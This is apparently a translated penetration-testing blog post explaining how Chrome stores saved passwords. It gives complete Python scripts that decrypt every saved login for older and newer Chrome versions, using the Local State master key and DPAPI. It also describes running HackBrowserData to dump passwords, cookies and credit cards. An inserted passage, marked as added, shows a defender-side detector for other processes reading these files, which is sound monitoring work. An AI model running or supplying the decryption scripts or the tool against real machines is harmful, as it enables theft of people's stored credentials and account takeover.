Contents

Grabbing browser passwords

Exporting from the Chrome browser

How Chrome stores saved passwords

Users can save passwords in Chrome; when the account name and password for a site are needed, they are filled in automatically.

Chrome's saved passwords can be found under Settings in the "Customize and control" menu:

https://s1.ax1x.com/2022/08/07/vKmaUx.png

Passwords saved by Chrome are encrypted a second time (by the operating system) and then stored in a SQLite database file at the following location:

%LocalAppData%\Google\Chrome\User Data\Default\Login Data

Hands-on test

Read the database file with a tool; the tool used for the test is SQLiteStudio.

SQLiteStudio is open source; its distinguishing feature is that it can display hexadecimal data (SQLiteSpy cannot display hex data).

Exporting Chrome passwords with Python

Reading the SQLite database file in Python:

from os import getenv
import sqlite3
import binascii

# Login Data lives under %LocalAppData%; the path is built relative to %APPDATA%
conn = sqlite3.connect(getenv("APPDATA") + "\\..\\Local\\Google\\Chrome\\User Data\\Default\\Login Data")
cursor = conn.cursor()
cursor.execute('select action_url, username_value, password_value from logins')

for result in cursor.fetchall():
    # password_value is the encrypted blob; print it as hex
    print(binascii.b2a_hex(result[2]))


This prints the encrypted user password blobs:

https://s1.ax1x.com/2022/08/07/vKm0PK.png

In the Chromium source code, the method used for this second layer of encryption can be found: it is implemented with the Windows API CryptProtectData().

Reference encryption code:

https://github.com/scheib/chromium/blob/eb7e2441dd8878f733e43799ea77c2bab66816d3/chrome/browser/password_manager/password_store_win_unittest.cc#L107

Documentation for the CryptProtectData() function:

https://msdn.microsoft.com/en-us/library/windows/desktop/aa380261(v=vs.85).aspx

From the documentation we learn that:

  1. the corresponding decryption function is CryptUnprotectData;
  2. only a user with the same logon credentials as the user who encrypted the data can decrypt it.

So the data can only be decrypted under the current user's credentials, and different versions of Chrome require different decryption methods.

Chrome Version < 80

from os import getenv
import sqlite3
import win32crypt  # from pywin32

# Raw string: backslashes in the Windows path would otherwise be read as escape sequences
conn = sqlite3.connect(getenv("APPDATA") + r"\..\Local\Google\Chrome\User Data\Default\Login Data")
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
    # Chrome < 80 protects each password directly with DPAPI; CryptUnprotectData returns
    # (description, data) and only succeeds when run as the same Windows user
    password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]
    print(password.decode("utf-8", errors="replace"))

Chrome Version > 80

import os
import json
import base64
import sqlite3
import win32crypt
from Cryptodome.Cipher import AES
import shutil


def get_master_key():
    # Chrome >= 80 keeps an AES key in Local State; that key itself is DPAPI-protected
    with open(os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\Local State', "r", encoding="utf-8") as f:
        local_state = json.loads(f.read())

    master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
    master_key = master_key[5:]  # strip the 5-byte "DPAPI" prefix
    master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1]
    return master_key


def generate_cipher(aes_key, iv):
    return AES.new(aes_key, AES.MODE_GCM, nonce=iv)


def decrypt_payload(cipher, payload):
    # The last 16 bytes of the blob are the GCM tag: verify it rather than silently dropping it
    return cipher.decrypt_and_verify(payload[:-16], payload[-16:])


def decrypt_password(buff, master_key):
    try:
        # Blob layout: "v10" prefix (3 bytes) | 12-byte nonce | ciphertext | 16-byte tag
        iv = buff[3:15]
        payload = buff[15:]
        cipher = generate_cipher(master_key, iv)
        return decrypt_payload(cipher, payload).decode()
    except Exception:
        # Blobs without the v10 layout are legacy DPAPI-only entries written by Chrome < 80
        return "Chrome < 80"


os.environ["PYTHONIOENCODING"] = 'utf-8'
master_key = get_master_key()
login_db = os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\Default\Login Data'
# Work on a copy: the live file is locked while Chrome is running
shutil.copy2(login_db, "Loginvault.db")
conn = sqlite3.connect("Loginvault.db")
cursor = conn.cursor()

try:
    cursor.execute("select action_url, username_value, password_value from logins")
    for r in cursor.fetchall():
        url = r[0]
        username = r[1]
        encrypt_password = r[2]
        # Use a name different from the function's, otherwise the second iteration calls a str
        plain_password = decrypt_password(encrypt_password, master_key)
        if len(username) > 0:
            print("URL: " + url + "\nUser Name: " + username + "\nPassword: " + plain_password + "\n" + "*" * 50 + "\n")

except Exception as e:
    print("query failed:", e)

cursor.close()
conn.close()
try:
    os.remove("Loginvault.db")
except Exception:
    pass

Note:

If Chrome is running, the Login Data database cannot be queried; the error shown is sqlite3.OperationalError: database is locked
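As an added defender-side example (not part of the original post and not code from HackBrowserData or Chromium): the scripts above must open two files, Local State and Login Data, that normally only chrome.exe reads. The Python below checks parsed Windows Security 4663 object-access records for any other process doing so; it assumes a SACL audit rule has been placed on the User Data directory so that such events exist, and the event records, user name and paths are constructed samples.

```python
from collections import defaultdict
from datetime import datetime, timedelta

CHROME_DIR = r"\google\chrome\user data"   # profile directory, lower-cased
WATCHED = ("local state", "login data")     # AES key file and credential database
LEGIT = {"chrome.exe"}                      # the only process expected to open them

# Constructed sample records in the shape of parsed Security 4663 events (not real logs)
SAMPLE_EVENTS = [
    {"time": "2022-08-07T10:00:01",
     "process": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "object": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"time": "2022-08-07T10:05:10",
     "process": r"C:\Users\alice\AppData\Local\Programs\Python\python.exe",
     "object": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Local State"},
    {"time": "2022-08-07T10:05:12",
     "process": r"C:\Users\alice\AppData\Local\Programs\Python\python.exe",
     "object": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"time": "2022-08-07T11:30:00",
     "process": r"C:\Windows\System32\notepad.exe",
     "object": r"C:\Users\alice\Documents\notes.txt"},
]


def watched_file(path):
    """Return 'local state' or 'login data' if path is one of the Chrome files, else None."""
    p = path.lower()
    if CHROME_DIR not in p:
        return None
    name = p.rsplit("\\", 1)[-1]
    return name if name in WATCHED else None


def find_suspicious(events, window=timedelta(seconds=60)):
    """Flag non-Chrome processes opening the watched files. Reading both Local State
    (AES key) and Login Data (blobs) within `window` is everything the Chrome >= 80
    procedure needs, so that is rated 'high'; touching only one of them is 'medium'."""
    hits = defaultdict(list)
    for ev in events:
        kind = watched_file(ev["object"])
        exe = ev["process"].rsplit("\\", 1)[-1].lower()
        if kind is None or exe in LEGIT:
            continue
        hits[ev["process"]].append((datetime.fromisoformat(ev["time"]), kind))
    findings = []
    for proc, entries in hits.items():
        kinds = sorted({k for _, k in entries})
        times = [t for t, _ in entries]
        both = len(kinds) == 2 and max(times) - min(times) <= window
        findings.append({"process": proc, "files": kinds, "severity": "high" if both else "medium"})
    return findings
```

In a real deployment the records would come from the event log or a SIEM export, and the allow-list would also need any backup or sync agent that legitimately touches the profile.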

Exporting with HackBrowserData

HackBrowserData is an export tool for browser data (passwords | history | cookies | bookmarks | credit cards | download records | localStorage | browser extensions) that supports the mainstream browsers on all platforms.
-- GitHub

HackBrowserData can be run directly by double-clicking it, in which case it automatically exports all the relevant information; it can also be invoked from the command line with the appropriate options.

  • Double-click to run

https://s1.ax1x.com/2022/08/08/vQpbaF.png

The results directory holds all the exported information.

  • Run from the command line

https://s1.ax1x.com/2022/08/08/vQ9gL6.png

References

  1. https://github.com/moonD4rk/HackBrowserData/blob/master/README_ZH.md
  2. https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E5%AF%BC%E5%87%BAChrome%E6%B5%8F%E8%A7%88%E5%99%A8%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81
  3. https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E7%A6%BB%E7%BA%BF%E5%AF%BC%E5%87%BAChrome%E6%B5%8F%E8%A7%88%E5%99%A8%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81